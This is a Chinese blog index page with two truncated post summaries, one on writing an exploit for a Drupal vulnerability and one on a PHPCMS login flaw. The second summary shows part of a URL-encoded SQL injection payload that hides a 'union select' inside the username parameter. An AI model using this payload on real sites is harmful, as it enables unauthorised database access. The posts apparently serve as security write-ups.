摘要： 0x00这个漏洞威力确实很大，而且Drupal用的也比较多，使用Fuzzing跑字典应该可以扫出很多漏洞主机，但是做批量可能会对对方网站造成很大的损失，所以我也就只是写个Exp不再深入下去。0x01关于漏洞的原理和POC在我的博客上已经有文章进行解释，这里只是着重说一下利用过程。配合POC的效果，我... 阅读全文

摘要： index.php?m=member&c=index&a=login 后缀username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupd... 阅读全文